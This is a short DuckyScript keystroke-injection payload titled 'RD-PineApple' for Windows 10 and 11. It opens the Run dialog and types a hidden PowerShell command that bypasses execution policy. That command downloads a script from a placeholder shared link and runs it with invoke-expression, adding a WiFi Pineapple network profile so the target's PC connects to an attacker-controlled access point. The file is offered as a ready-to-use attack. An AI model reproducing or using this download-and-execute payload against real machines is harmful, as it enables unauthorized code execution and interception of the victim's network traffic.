REM Title: RD-PineApple
REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
REM This version of the payload is executed using an invoke web-request to download and execute the file to add the PineApple's network profile
REM The powershell script needed is provided as OMG-PineApple.ps1
REM Author: I am Jakoby
REM Target: Windows 10, 11

REM This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it

GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER
